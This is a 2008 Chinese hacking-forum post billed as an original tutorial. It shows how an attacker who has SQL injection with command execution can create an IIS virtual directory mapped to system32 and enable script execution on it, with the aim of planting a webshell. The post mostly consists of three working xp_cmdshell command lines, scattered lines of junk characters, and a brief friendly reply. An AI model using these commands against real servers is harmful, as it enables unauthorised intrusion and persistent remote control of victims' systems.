标题:
[原创教程]
如何SQL注入建立虚拟目录
[打印本页]
作者:
平湖秋月
时间:
2008-10-22 14:38
标题:
如何SQL注入建立虚拟目录
很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:
& {1 }! E- j/ \
( {9 }) @$ H+ s- g9 }- J$ A9 }
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'
" d3 ^3 P1 B/ M. D% B! Q2 N( D$ f
建立虚拟目录win,指向c:\windows\system32
6 }5 Z& u1 f& V7 N0 i0 s4 e
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
: ^& {0 o4 f* ~, }9 j+ `" L' M
让win句有解析asp脚本权限
' ^+ c; W4 o1 q) q% }0 p
8 p. f: s5 p8 e+ X* F; A' T' o+ R" G
exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"
7 t5 N" E. e4 f& S; Y
删除虚拟目录。
& ]2 H% P8 R9 h m
找不到web绝对路径的一种解决办法,
$ T2 G2 o) e# w1 z
: W- ^: Y6 F0 H8 t" ]9 n; o
403错误,表示虚拟目录建好了。。
作者:
wmmy
时间:
2008-10-22 21:59
呀 LZ好久不见你上了啊
欢迎光临 【3.A.S.T】网络安全爱好者 (http://www.3ast.com/)
Powered by Discuz! 7.2
